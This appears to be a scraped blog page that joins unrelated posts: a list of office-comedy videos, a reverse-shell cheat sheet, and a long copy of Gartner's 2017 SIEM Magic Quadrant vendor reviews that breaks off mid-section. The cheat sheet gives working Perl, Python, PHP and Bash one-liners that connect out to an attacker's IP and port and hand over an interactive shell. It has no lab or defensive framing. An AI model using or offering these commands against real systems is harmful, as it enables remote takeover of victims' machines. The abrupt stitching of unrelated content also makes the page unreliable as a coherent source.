Everyone in sales needs watch these videos;

Everyone in sales needs watch these videos;

A Conference Call – https://www.youtube.com/watch?v=kNz82r5nyUw

Meeting Backup – https://www.youtube.com/watch?v=wU99CCWr77k

The Expert – https://www.youtube.com/watch?v=BKorP55Aqvg

Email in Real Life – https://www.youtube.com/watch?v=HTgYHHKs0Zw

A Video Conference in Real Life – https://www.youtube.com/watch?v=JMOOG7rWTPg

Stuff Business People Say – https://www.youtube.com/watch?v=MHg_M_zKA6Y

Working from Home – https://www.youtube.com/watch?v=co_DNpTMKXk

Advertisements

Reverse shells

Reverse shells

 

1.  perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2.  perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3.  perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'<IP>:<PORT>');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"

 

python reverse shell (recommended)

1. python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((” “, ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

and if you want to get full terminal support you have to load more modules into it using this command below :

python -c ‘import pty; pty.spawn(“/bin/sh”)’

php reverse shell

1. php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
2. php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
3. php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
4. php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
5. php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

bash reverse shell

1. bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

2. exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

3. exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

 

 

Magic Quadrant for Security Information and Event Management

Magic Quadrant for Security Information and Event Management

Published: 04 December 2017 ID: G00315428

Analyst(s):

 

Summary

Security and risk management leaders are implementing and expanding SIEM to improve early targeted attack detection and response. Advanced users seek SIEM with advanced profiling, analytics and response features.

Market Definition/Description

This document was revised on 26 February 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.

The security information and event management (SIEM) market is defined by the customer’s need to analyze event data in real time for the early detection of targeted attacks and data breaches, and to collect, store, analyze, investigate and report on event data for incident response, forensics and regulatory compliance. The vendors included in our Magic Quadrant analysis have products designed for this purpose, and they actively market and sell these technologies to the security buying center.

SIEM tools aggregate event data produced by security devices, network infrastructure, systems and applications. The primary data source is log data, but SIEM tools can also process other forms of data, such as NetFlow and network packets, or contextual information about users, assets, threats and vulnerabilities that can be found inside or outside the enterprise and that can be useful to enrich logs and raw data. All these data are normalized so that events, data and contextual information from disparate sources can be correlated and analyzed for specific purposes, such as threat management, network security event monitoring (SEM), user activity monitoring and compliance reporting. The tools provide real-time correlation of events for security monitoring, enable query and analytics for historical analysis, and offer other support for incident investigation and compliance reporting.

Magic Quadrant

Figure 1. Magic Quadrant for Security Information and Event Management

Research image courtesy of Gartner, Inc.

Source: Gartner (December 2017)

Vendor Strengths and Cautions

AlienVault

AlienVault competes in the SIEM market with two offerings: AlienVault Unified Security Management (USM) Appliance (physical or virtual) for on-premises deployment and AlienVault USM Anywhere, a cloud-based SaaS solution. USM Appliance includes file integrity monitoring (FIM) via the host intrusion detection system (IDS), NetFlow analysis and full-packet capture. USM Anywhere is designed to monitor cloud and on-premises environments from the AlienVault Secure Cloud. AlienVault also offers Open Threat Exchange (OTX), a free, community-supported threat intelligence sharing forum that integrates threat intelligence into USM. AlienVault Labs Threat Intelligence is a subscription service that updates correlation rules, reports, response templates, signatures for IDS and vulnerability checks in both USM Appliance and USM Anywhere. AlienVault is no longer offering its USM for Amazon Web Services (AWS) product, and customers of USM AWS have been migrated to USM Anywhere.

USM Anywhere became generally available in February 2017, and is the result of a from-scratch development effort. The focus of USM Anywhere is monitoring cloud environments, initially AWS and Microsoft Azure, although monitoring of on-premises technology is supported as well. The USM Anywhere architecture accommodates apps (AlienApps) to enable adding capabilities in a modular fashion. USM Anywhere and USM Appliance features and capabilities differ somewhat. AlienVault’s current plans are to continue to offer both USM Appliance and USM Anywhere. The pricing model for USM Appliance is based on the number of appliances required, available as a perpetual license or monthly subscription. USM Anywhere is sold as a monthly subscription, priced by the volume of data consumed.

STRENGTHS
  • USM Appliance and USM Anywhere provide several integrated security capabilities, including asset discovery, FIM, vulnerability assessment, and both host-based and network-based intrusion detection systems.
  • AlienVault provides content updates via its Threat Intelligence subscriptions, as well as community source intelligence, that are integrated into the monitoring, detection and reporting functions of USM Appliance and USM Anywhere.
  • Customers report that the security monitoring technologies included with USM offer a lower cost for more capabilities compared with products from most competitors in the SIEM space.
  • The pricing model for USM Anywhere and USM Appliance is straightforward and easy to understand, and the availability of monthly subscription pricing for USM Appliance offers flexibility.
CAUTIONS
  • There are differences in the capabilities of USM Appliance and USM Anywhere that may present potential buyers with trade-offs. For example, capturing NetFlow data is supported by USM Appliance, but not by USM Anywhere. USM Anywhere, however, can capture VPC flow logs from AWS. USM Appliance uses correlations to provide basic enrichment of event data with user context, and USM Anywhere uses a graph-based engine to support a basic user and entity behavior analytics (UEBA) capability focused on cloud environments.
  • USM Appliance has more limited support for cloud environments than USM Anywhere. For example, in AWS, USM Anywhere monitors CloudTrail, CloudWatch Classic Load Balancer, Application Load Balancer and Simple Storage Service (S3) access, plus logs for installed software, and provides vulnerability assessments. USM Appliance provides monitoring of Windows and Linux guests on AWS via an HIDS agent.
  • AlienVault’s target market is midsize enterprises and smaller organizations. As a result, enterprise-oriented features, such as role-based workflow, ticketing integrations, support for multiple threat intelligence feeds and advanced analytics capabilities, lag behind those of competitors that focus on enterprise customers.

BlackStratus

BlackStratus is a SIEM technology and service-focused vendor with solutions aimed at large enterprises, small or midsize businesses (SMBs), managed security service providers (MSSPs), and managed service providers (MSPs). The portfolio is composed of LOGStorm, SIEMStorm and CYBERShark. LOGStorm is a log and event management and reporting tool targeted at SMBs and MSSPs. It is available as a physical and virtual appliance. LOGStorm leverages a Vertica big data platform and stores both raw and normalized event data. SIEMStorm is a natively multitenant platform that is delivered as software, where components can be installed on a single physical or virtual server, or installed separately depending on the size and scope of the environment to be monitored. SIEMStorm includes core SIEM capabilities including real-time event management, correlation, analytics, workflow and incident response, and reporting. It is targeted at large enterprises or organizations with federated security monitoring requirements (e.g., across lines of business or child companies), as well as at MSSPs needing to support customers in a shared, multitenant environment. CYBERShark is a SIEM as a service aimed at MSPs and SMBs. It is delivered as a cloud-based solution, along with 24/7 Tier 1 security operations center (SOC) security monitoring and alerting services.

Recent enhancements of the platforms include a variety of new product integrations, in particular support for AWS, Azure, Office 365 and ServiceNow, as well as improvements to the user interface and back-end performance optimizations. Support for GE Digital (Wurldtech) OpShield was added to extend SIEMStorm to operational technology security monitoring use cases.

STRENGTHS
  • The architectures for SIEMStorm and LOGStorm are flexible for both deployment and expansion. All application components are multitenant out of the box.
  • Integrations added over the past 12 months extend support for popular service desk solutions, as well as SaaS and IaaS environments.
  • Support for OT data sources is now a native feature, albeit with limited support for OT security-based threat detection vendors, such as GE Digital (Wurldtech).
  • SIEMStorm includes a fully integrated incident and ticket management system based on the SANS Institute’s incident handling process.
CAUTIONS
  • Native advanced threat detection solutions, such as FIM, endpoint detection and response (EDR), network deep packet inspection, and network forensics, are not available. The vendor’s open API does allow for integration with a variety of third-party solutions.
  • Advanced analytics capabilities are very limited. BlackStratus indicates that expansion of analytics is planned over the next year.
  • Support for identity and access management (IAM) solutions is limited. User-based event monitoring is provided for Active Directory (AD) and a variety of web access management (WAM) solutions.
  • SIEMStorm’s workflow capabilities lack orchestration and automation features.
  • BlackStratus has a large MSSP and MSP customer base, but lacks visibility with Gartner’s enterprise and SMB end-user clients.

Dell Technologies (RSA)

RSA (a Dell Technologies business since the acquisition of EMC by Dell in September 2016) competes in the SIEM market via its RSA NetWitness Suite. The suite is composed of RSA NetWitness Logs and Packets, RSA NetWitness Endpoint, and RSA NetWitness Security Operations (SecOps) Manager. RSA NetWitness Suite is focused on real-time threat detection, incident response, forensics and threat hunting use cases leveraging network full-packet capture, security event and log data, NetFlow, and telemetry from endpoints. The architecture is composed of the RSA NetWitness Server along with Decoders (full-packet capture, logs, NetFlow and endpoint data collection); Concentrators (metadata aggregation and indexing); Event Stream Analytics (analytics for real-time monitoring and alerting); and Archivers (data and event archiving tier). There is a stand-alone management server for RSA NetWitness Endpoint. RSA NetWitness Suite offers flexible deployment options as it can be installed as software, physical and virtual appliances, and in hybrid configurations. On-premises as well as IaaS environments are supported. Scalability (both vertically and horizontally) is supported through the deployment of additional components (e.g., Decoders, Concentrators and Archivers). RSA NetWitness SecOps Manager, a module in the RSA Archer solution, adds advanced incident management workflow, operational playbooks, management dashboards and reporting. The solution is primarily licensed by volume (software model) or per appliance for Logs and Packets, and by number of agents for Endpoint. Both perpetual and term models are available.

Since mid-2016, RSA has added additional support for event and data collection within IaaS (AWS and Azure), support for deploying RSA NetWitness Suite components in AWS, and additional feature and functionality enhancements, such as the addition of RSA Live-delivered content packs focused on new users as well as advanced threat hunters, Trial Rules (allows rules to be demoed before being implemented in production), Endpoint agent support added for Linux and Mac, and expanded command-and-control behavior-based analytics. RSA NetWitness Suite 11, released in October 2017, provides a new user interface and enhancements to capabilities for investigation, incident management and identity insights.

STRENGTHS
  • RSA NetWitness Suite offers a single-solution approach for threat detection and event monitoring, investigation, and response across network traffic, endpoints and other security event and log data sources.
  • RSA NetWitness Suite’s focus on advanced threat detection, incident response, forensics and threat hunting makes it a viable solution for buyers with, or planning to deploy, a SOC and those looking for a single, integrated platform across teams.
  • RSA Live, a cloud-based service, provides a marketplace-type interface for RSA NetWitness content packs (threat detection rules, parsers, reports), threat intelligence and third-party integrations. Threat intelligence and content updates can be automated so they are seamless to users.
  • The RSA NetWitness Suite provides a flexible architecture that scales from a single appliance to complex n-tier deployments, which can span both on-premises and IaaS.
  • Out-of-the-box threat intelligence includes access to over two dozen threat feeds, including intelligence from RSA’s FirstWatch research team and incident response activities, and RSA Live provides crowdsourced threat intelligence from RSA NetWitness customers.
CAUTIONS
  • RSA NetWitness Suite’s user interface is basic compared to competing SIEM solutions. RSA indicates that a new UI is included with version 11, released in October 2017.
  • RSA NetWitness Logs and Packets lags behind similar SIEM solutions in UEBA capabilities. Integrations are available with third-party UEBA vendors.
  • RSA NetWitness Suite’s incident management capabilities are lightweight. Buyers looking for richer workflow capabilities need to purchase RSA NetWitness SecOps Manager.
  • Native security orchestration and automation capabilities are limited, but out-of-the-box integrations with most third-party security operations, analytics and reporting (SOAR) solutions are available.

EventTracker

In October 2016, EventTracker merged with Netsurion, a provider of managed security services, and EventTracker continues as a subsidiary with its own brand. EventTracker targets its SIEM software and service offerings primarily at midsize and government organizations with security event management and compliance reporting requirements. EventTracker Enterprise software is available, with licensing based on the number of event sources. Standard components include correlation, alerting, behavior analysis, reporting, dashboards and a large number of event source knowledge packs. Options include configuration assessment, change audit FIM, ntopng, flow analyzer, honeynet, threat intelligence feeds and the analyst data mart. Service offerings include SIEMphonic co-managed SIEM aligned to run, watch, tune and comply with activities performed on schedules ranging from daily to weekly. Collection from and deployment in AWS and Azure are natively supported.

In the past year, EventTracker has added a security scorecard dashboard that provides a risk-prioritized view of security incidents and a deception component (honeynet) offered as a managed service. Support for NIST SP 800-171 and the EU’s General Data Protection Regulation (GDPR), as well as 23 NYCRR 500 compliance, was also introduced.

Midsize businesses requiring a software-based solution for log and event management, compliance reporting, and operations monitoring via on-premises or cloud-hosted SIEM with optional, flexible monitoring services should consider EventTracker.

STRENGTHS
  • EventTracker is easy to deploy and maintain, and offers compliance and use-case-specific content with prebuilt alerts, correlation rules and reports.
  • EventTracker’s software pricing model is based on the number of event sources and is thus relatively straightforward for potential customers to understand. Perpetual license and annual subscription pricing are offered.
  • EventTracker’s SIEMphonic managed SIEM services aligned with run, watch, tune and comply activity are a differentiator, and address the needs of its target market.
CAUTIONS
  • EventTracker’s SIEMphonic managed SIEM services offerings are based on data volume (not event source count, which is the model for the software), thus potential buyers comparing options will need to make different calculations when developing assumptions about the scope and growth of the monitored environment.
  • EventTracker’s advanced threat detection features are basic, Windows-centric and, in the case of flow and packet capture, not cleanly integrated into the core product. Integrations with third-party advanced threat detection/response technologies are not available.
  • EventTracker’s capabilities for application monitoring are more limited than SIEM products that target enterprise deployments, as they lack integration with major packaged applications.
  • Full incident management, including ticketing, requires an external solution. Several integrations via email and XML are supported.

Exabeam

Exabeam Security Intelligence Platform is a collection of components that collectively deliver the Exabeam SIEM solution that was introduced in February 2017. The platform is built on a variety of big data technologies, including Elastic, Hadoop, Kafka and Spark. Data management (collection, parsing, indexing and storage) is provided by Log Manager, which also includes agent-based collectors that can collect logs from local resources or from cloud-based applications using RESTful APIs. Advanced Analytics, also sold as Exabeam’s stand-alone UEBA tool, provides analytics functionality via a collection of both expert rules as well as behavior- and machine learning (ML)-based analytics. Incident Responder provides workflow, case management, security orchestration and automation capabilities. Threat Hunter is a search and investigation tool oriented toward analysts doing incident investigations and analyses, or threat-hunting-oriented activities. Threat Hunter provides user-based timelines rather than focusing on standard query and search approaches. Customers requiring connecting to IaaS and SaaS can purchase Exabeam’s Cloud Connectors, which are prebuilt API connectors for a variety of services, such as several AWS services, Office 365, SharePoint, Box and Salesforce. Exabeam’s components can be run on dedicated appliances (two versions are currently available), and installed as software or virtual appliances.

STRENGTHS
  • Exabeam’s licensing approach is based on the number of users in an organization, rather than the velocity or volume of event, log and contextual data analyzed.
  • Exabeam has established itself as complementary to existing SIEM solutions through its UEBA solution, which forms the core of the vendor’s solution portfolio. Advanced Analytics is included as part of the core platform, rather than as an add-on to complement traditional signature- and correlation-based rules.
  • Customers can customize the SIEM platform by selecting the components to meet their requirements (e.g., starting out with Log Manager and Advanced Analytics and adding Incident Responder and Threat Hunter as buyer experience and maturity in security monitoring improve).
  • Exabeam’s architecture is big data-oriented and supports a variety of deployment options (physical and virtual, and on-premises, IaaS or hybrid) and offers easy horizontal scalability through the addition of more appliances.
CAUTIONS
  • Most of Exabeam’s full platform, except for Advanced Analytics (which has been available for several years as a stand-alone UEBA tool, complementing SIEM), does not yet have widespread adoption and use compared to most SIEM solutions on the market.
  • Predefined reporting capabilities against industry and regulatory requirements are nascent, given the focus on user-based monitoring. Reports can be created from searches and saved as dashboards, or created from visualization capabilities for viewing and exporting.
  • Exabeam’s platform lacks native network traffic analysis capabilities, although it supports a variety of third-party solutions. Flow data cannot yet be analyzed, but is available for ingestion and searches as part of incident investigations.

FireEye

FireEye is a new entrant in the SIEM Magic Quadrant. FireEye’s SIEM offering is Threat Analytics Platform (TAP), which is delivered as a service leveraging AWS. TAP provides real-time security analytics, investigative threat hunting, monitoring and data management, and storage, with data segregated on a per-customer basis. Integrated threat intelligence is provided by in-house iSIGHT security researchers and Mandiant incident responders. Both multitenant as well as single-instance versions are supported.

TAP customers deploy a Cloud Collector appliance on their network to aggregate and securely transmit logs to TAP. Cloud Collector can also be deployed as a network security monitoring appliance that generates its own network metadata events as well as providing selective full-packet capture. Cloud Collector can be deployed as software, an ISO installer that supports bare-metal hardware or virtualized environments, or a physical appliance. Licensing is based on events per second (EPS) and data storage/retention requirements (13 months is the default.)

STRENGTHS
  • TAP’s as-a-service delivery model gets strong marks for ease of deployment. There is no technology for customers to manage and only Cloud Collector appliances to deploy. There is out-of-the box support for a large variety of event sources. There are more than 2,300 predefined rules for alerting, which are updated or added continually.
  • Threat intelligence from FireEye iSight, as well as curated open-source feeds, is included with the service.
  • Guided investigation support for incidents and events includes best-practice suggestions and predefined searches.
  • FireEye provides an optional 24/7 monitoring service (FireEye as a Service) for customers that lack the resource to staff full-time operations.
CAUTIONS
  • TAP currently includes a limited number of report templates, with PCI and HIPAA templates available for compliance reporting.
  • Integrations with enterprise configuration management databases (CMDBs) and AD, support for STIX and TAXII, and more advanced orchestration and automation features are available only with the additional purchase of FireEye Security Orchestrator.
  • Potential customers should closely evaluate TAP’s current capabilities for advanced analytics against the use cases they want to support. User behavior analytics and analytics covering long time frames are not available.

Fortinet

FortiSIEM, acquired from AccelOps in 2016, is a component of Fortinet’s Security Fabric framework that provides traditional SIM and SEM capabilities, complemented by a built-in CMDB, application and system performance monitoring capabilities, and agent-based FIM. Fortinet positions FortiSIEM for MSPs, telecommunications providers and MSSPs that use or support other Fortinet solutions, in addition to security operations buyers in large enterprises, government and education. FortiSIEM has been adopted by organizations where security and network operations monitoring are delivered from a unified solution, as well as by MSPs and MSSPs that take advantage of the full FortiSIEM stack.

FortiSIEM’s architecture is composed of four components (Supervisors, Worker, Collector and Report Server) that are deployed via virtual appliances supported across a variety of on-premises (ESX, KVM, Hyper-V, Zen and OpenStack) and IaaS platforms (AWS and Azure), and can be deployed as a single appliance or stand-alone components for scalability. Data management leverages a mix of big data (NoSQL) and RDBMS. Managed SIEM as a service is also available to end users as well as to MSPs and MSSPs. Physical appliance options and a remediation library for integrations with third-party tools are expected later in 2017. Licensing is primarily based on the number of data sources, EPS and agents deployed.

Over the past 12 months, Fortinet has added additional integrations within the Fortinet Security Fabric, as well as adding risk-based scoring for devices; STIX and TAXII support for improved threat intelligence capabilities; user activity auditing for SaaS such as Office 365 and G Suite; and the initial move to an HTML5-based UI.

STRENGTHS
  • FortiSIEM provides a single platform for organizations looking to support multiple environments (on-premises physical and virtual, SaaS, and IaaS), use cases and teams across IT (network operations, security operations and application performance monitoring [APM]).
  • A built-in autodiscovery feature and an integrated CMDB capability support use cases across IT, network operations and security operations.
  • FortiSIEM’s scope of reporting covers a wide variety of compliance requirements and best practices for both security operations and network operations across several geographies.
  • Midmarket organizations, especially those leveraging other Fortinet products, where security responsibilities are federated out to teams like network operations, will benefit from the unified platform available with FortiSIEM, which includes native workflow and the ability to perform basic automated response activities.
CAUTIONS
  • FortiSIEM lags behind the competition in advanced analytics capabilities and easy integration (e.g., through an app store interface) with third-party technologies, such as EDR, UEBA, and security orchestration and automation tools.
  • Out-of-the-box threat intelligence is not provided, but support for Fortinet’s FortiGuard threat intelligence platform, as well as integrations with third-party threat feeds, is provided.
  • FortiSIEM has limited visibility with Gartner clients procuring SIEM solutions.

IBM

IBM QRadar Security Intelligence Platform is composed of QRadar SIEM at the core, with additional components providing complementary security monitoring and operations capabilities, such as log management (Log Manager), network monitoring (QFlow, Network Insights and Incident Forensics), vulnerability management (Vulnerability Manager) and risk management (Risk Manager). IBM positions QRadar as an on-premises solution available via a stand-alone or distributed architecture, SIEM as a service (QRadar on Cloud) or as co-managed QRadar in partnership with IBM Managed Security Services. QRadar’s on-premises architecture is deployed via physical or virtual appliances (for on-premises or IaaS), software, and hosted cloud. The core components include Event Collectors and Event Processors, QFlow Collectors and Processors, Data Nodes, and Consoles, in addition to the premium components. Advanced threat detection and response capabilities include UEBA functionality (the QRadar UBA App) supported by ML-based analytics (QRadar Machine Learning Analytics app), threat intelligence provided by IBM’s X-Force Threat Intelligence feed, QRadar Advisor with Watson app and Resilient Incident Response Platform for incident response and orchestration and automation capabilities. IBM QRadar is licensed primarily by EPS and flows per second (FPS), and premium modules and apps are charged separately.

Over the past 12 months, IBM has introduced a variety of new capabilities, including user behavior analytics (UBA), Machine Learning Analytics app, Advisor with Watson app, Network Insights and platform enhancements around user interfaces and usability features, and data storage compression and optimization. Integrations with partners have been expanded through additions to QRadar App Exchange. IBM Resilient (an incident response tool) is now being offered as a premium service alongside QRadar engagements.

STRENGTHS
  • QRadar supports both midsize and large enterprises that require core SIEM capabilities, in addition to those looking for a unified platform that covers a wide range of security monitoring and operational technologies.
  • QRadar provides a flexible architecture that can support a variety of environments, including hybrid monitoring options across on-premises and IaaS.
  • QRadar App Exchange provides an improved user experience for integrating premium content, content packs and third-party security controls into the QRadar Console and Security Intelligence Platform compared to many competitors.
  • Buyers looking to implement advanced analytics and user-based monitoring will benefit from the free UBA and ML apps provided with the core SIEM product.
  • QRadar offers a single view across real-time and historic network-based event sources through the correlation of log data, NetFlow, QFlow, deep packet inspection (via Network Insights) and full-packet capture.
  • There is widespread availability of managed service support for on-premises QRadar deployments from third parties (and from IBM for large accounts), and QRadar is also available in a hosted SIEM model.
CAUTIONS
  • Endpoint monitoring for threat detection and response, or basic file integrity, requires use of third-party technologies. IBM has positioned its BigFix product as a component in this space, especially for security response activities, but there has been very little interest from Gartner clients for this approach.
  • Gartner clients that have deployed or are considering QRadar have not expressed much interest in QRadar Advisor with Watson.
  • While IBM has introduced its UBA and ML apps, UBA features lag behind the UEBA-centric SIEM vendors. Integrations with several UEBA vendors are supported through QRadar App Exchange.
  • IBM Resilient still lacks native integration into the QRadar platform. Integration is available through QRadar App Exchange.
  • Customer feedback on the QRadar architecture is generally positive, but for buyers requiring a multicomponent-based architecture, the number of licensable components and options required generates confusion as part of the acquisition and purchase process.

LogRhythm

LogRhythm Threat Lifecycle Management Platform provides core SIEM capabilities, in addition to optional add-ons for network and host monitoring. LogRhythm’s SIEM solution consists of several components that can be run from a single appliance or separately as discrete components — Data Collector, Data Processor, Data Indexer, AI Engine, Platform Manager and WebUI Services. System Monitor Agents (available for Windows, Unix and Linux platforms and in two flavors — Pro and Lite) provide FIM functions, but can also act as event forwarders to Data Collectors. Network Monitor provides network and application traffic visibility, as well as selective packet capture for forensic purposes. LogRhythm’s SIEM can be deployed in a variety of ways — as software, or as physical or virtual appliances, either as a single appliance solution or for the various discrete components to support a variety of architectural approaches. LogRhythm can be deployed on-premises, in IaaS and in hybrid operating models. Multitenancy for MSSP buyers is also natively supported. LogRhythm SIEM is a velocity-based license approach measured by messages per second (MPS), and licenses are available as perpetual or term. Enterprise license agreements are also available. Physical appliances are available for additional charge. System Monitor is priced per host and Network Monitor is priced per gigabits throughput.

In the past 12 months, LogRhythm has made usability improvements across a variety of functions and features, including case management, workflow and response with the SmartResponse feature, improved user monitoring analytics, delivered enhancements to System Monitor and Network Monitor (including expansion into OT environment monitoring), usability improvements for real-time monitoring, and content updates delivered via AI Engine.

STRENGTHS
  • LogRhythm provides a strong platform for organizations that want a contained platform that includes core SIEM capabilities enhanced by complementary host and network monitoring capabilities, in a solution that can scale from a single appliance up to n-tier architectures.
  • LogRhythm’s out-of-the-box content (and updates delivered to the AI Engine component), along with a powerful user interface, provides a strong real-time monitoring experience for users.
  • SmartResponse allows users to integrate preconfigured automated response activities into their alert, investigation and response activities, either fully automated or semiautomated (e.g., manually initiated).
  • Organizations considering security monitoring of ICS/SCADA or OT environments, or looking to merge security event monitoring of their IT and OT environments, should consider LogRhythm.
  • Gartner clients, particularly midsize and smaller enterprise organizations, report that the simplified deployment model and support by LogRhythm via the Core Deployment Service is useful. Customers with specific use cases indicate that the Analytics Co-Pilot Service is also useful to speed up implementation times.
CAUTIONS
  • LogRhythm lags the UEBA-centric SIEM vendors in ML-driven analytics. The vendor has announced a cloud-based advanced analytics capability called CloudAI, which was released to a limited number of users in early 2017, with general availability targeted for 4Q17.
  • There is no application store for easily integrating third-party solutions like several other competing products, and the platform’s APIs are less open to third parties to facilitate easier integrations, although LogRhythm has a partner program to facilitate custom integrations.
  • LogRhythm supports a limited number of threat intelligence feeds out of the box, although users can add custom STIX/TAXI feeds with the LogRhythm TIS utility, and LogRhythm provides API-based support for other formats. Buyers with third-party threat intelligence feeds should confirm support with LogRhythm.
  • A few customers have expressed concerns about LogRhythm’s ability to scale to support very high event volume environments. Buyers with those environments should validate LogRhythm’s ability to support anticipated event and data volumes.
  • Some Gartner clients have raised concerns about the use of Windows as the underlying platform for components in the overall architecture (the Data Indexer is Linux-based), especially around maintaining patch and hotfix currency. Buyers should follow patching best practices and monitor LogRhythm for patch advisories.

ManageEngine

Log360 is the SIEM offering from ManageEngine, a division of Zoho. ManageEngine Log360 is composed of three components — EventLog Analyzer, which provides core SEM and SIM features including event log management, correlation-based analytics, and management/UI for reports, dashboards and log search functionality; ADAudit Plus, which provides real-time monitoring and auditing for AD; and Cloud Security Plus, which manages log event data from public cloud environments. EventLog Analyzer is offered in two versions: Premium is for single instance deployment, and Distributed, which uses a centralized admin server, is for large organizations or MSPs/MSSPs that need to scale horizontally beyond a single EventLog Analyzer instance (e.g., multitenant use cases or a single, geographically distributed organization). ADAudit Plus is offered in two versions — Standard and Professional — depending on the features required. Log360 is only available as a software version, but can be installed into virtual environments. It is licensed by the software components, version, and number of event log and data sources.

Over the past 12 months, ManageEngine has added support for monitoring AWS and Azure public cloud services, enhanced analytics with field-level correlation, improved incident response capabilities and integrations with service desk solutions. It has also added out-of-the-box threat intelligence feeds and improved auditing of AD (e.g., AD Federation Services [ADFS] and AD Lightweight Directory Services [ADLDS]), among other enhancements.

STRENGTHS
  • Either ManageEngine Log360 or EventLog Analyzer is a good choice for existing ManageEngine customers looking for an integrated solution, as well as for organizations looking for a simple, cost-effective SIEM solution.
  • ManageEngine addresses heavy auditing and compliance capabilities. Over 1,200 predefined reports, including various compliance-focused ones, are available out of the box.
  • ADAudit Plus provides stand-alone or integrated monitoring of AD for identity and access governance requirements.
  • ManageEngine’s architecture and deployment are straightforward and easier to deploy than many SIEM solutions. Log360 includes a wide range of out-of-the-box correlation rules as well as threat intelligence feeds. Organizations primarily using Windows are well-supported with built-in log source identification and integration capabilities.
CAUTIONS
  • EventLog Analyzer only provides basic SIEM threat detection functionality. Support is lacking for third-party threat intelligence endpoints and for network-based traffic (e.g., NetFlow).
  • Log360 integrates EventLog Analyzer and ADAudit Plus; however, analysts are required to use two different interfaces to perform various activities, such as monitoring for new incidents, investigations and reporting.
  • Scalability of the platform may present challenges for larger organizations. Buyers should confirm that event and data volumes, and AD sizes, are supported. Horizontal scaling is supported, but n-tier scalability may be a challenge.
  • ManageEngine buyers report difficulty working with remote support staff after purchase.
  • ManageEngine has little visibility with Gartner clients for SIEM use cases.

McAfee

McAfee Enterprise Security Manager (ESM) provides core SIEM functionality, including a web-based user interface, a parsed event database, reporting capabilities and central management of other components in the solution. The other components in the solution include Event Receiver (ERC), which provides event and flow collection, and event parsing and normalization; Enterprise Log Manager (ELM), which collects, manages and stores all raw events; Advanced Correlation Engine (ACE), which provides real-time analytics using four types of correlation approaches (rule-based, risk-based, statistical and historical); and Enterprise Log Search (ELS) for log search functionality. Buyers can also purchase the McAfee Database Event Monitor (DEM), which provides real-time discovery and transaction-level database monitoring; Application Data Monitor (ADM), which provides application-level (e.g., Layer 7) decoding and inspection of network traffic; and Global Threat Intelligence (GTI), a threat intelligence feed produced by McAfee Labs. The McAfee SIEM can be deployed as physical or virtual appliances, either as an all-in-one offering (where ESM, ELM and ERC components are on a single appliance) or as individual, discrete components. Physical and virtual appliances can be run together in hybrid-type deployments. The flexible deployment options support n-tier architectures. McAfee’s SIEM solution is licensed as a perpetual model, primarily by maximum event volume per appliance as measured in EPS. Physical appliances are an additional charge. McAfee ADM is licensed by bandwidth in gigabytes per second and GTI is licensed per ESM server deployed.

Over the last year, McAfee has primarily focused on transitioning the ESM underlying architecture to a big data-based approach that leverages technologies like Elastic and Kafka, which is supported with the release of a new generation of physical appliances (although many earlier appliance models support the new architecture too). Additionally, the user experience was also addressed via a new HTML5-based interface that included improved visualizations and workflow capabilities (although the interface is not yet 100% available across the entire solution). Forensics capabilities were improved via the release of ELS.

STRENGTHS
  • McAfee’s architecture and licensing approach, especially for buyers looking for turnkey appliances (both physical and virtual), simplifies purchases and deployments.
  • Customers of other McAfee products, as well as the large set of vendors that are part of the McAfee Security Innovation Alliance, will benefit from native integrations as well as interoperability provided by the Data Exchange Layer (DXL) framework.
  • Organizations that require SEM of OT environments (ICS/SCADA) should consider ESM and ADM due to a long history of supporting OT environments (e.g., being able to run as a “one-way diode”) and through specific prepackaged content (rules, dashboards and reports).
  • Customer satisfaction, with both the product and support, over the past 12 months has improved compared to previous periods.
CAUTIONS
  • McAfee lacks advanced, machine-driven analytics capabilities, compared to leading competitors. The planned changes to the platform to run on a big data architecture should enable development of these capabilities.
  • McAfee ESM has workflow and case management, but is lacking in automation and orchestration capabilities. Support for many third-party SOA tools is available.
  • Customers report ongoing concerns about options for training and education on the ESM platform.

Micro Focus (ArcSight)

In September 2017, Hewlett Packard Enterprise (HPE) and Micro Focus closed a business transaction that resulted in the ArcSight SIEM product becoming part of the Micro Focus business. ArcSight Enterprise Security Manager (ESM) is the core component of ArcSight’s SIEM solution. Data collection and management is enabled by ArcSight Data Platform (ADP) using HDFS, Kafka, and Logger and Connectors (both prepacked SmartConnectors and customizable FlexConnectors). The ArcSight Management Center (ArcMC) handles configuration management. ESM provides real-time analytics and monitoring, search, reporting, case management, and workflow. ArcSight ESM Express is available for single, all-in-one system implementations. ArcSight Investigate, built on top of Micro Focus Vertica, is a purpose-built big data and analytics platform that enables data search for incident investigation as well as threat hunting uses. UBA is possible via a repackaged version of Securonix Bolt that provides advanced analytics-based user monitoring capabilities (peer group analysis and ML). DNS Malware Analytics (DMA) is a SaaS-delivered solution that applies advanced analytics that use DNS events to detect malware-infected hosts. DMA will be incorporated into the next release of ArcSight Investigate. The solution can be deployed as a physical appliance or as software, with bare-metal, virtual and IaaS options supported. Multitenant 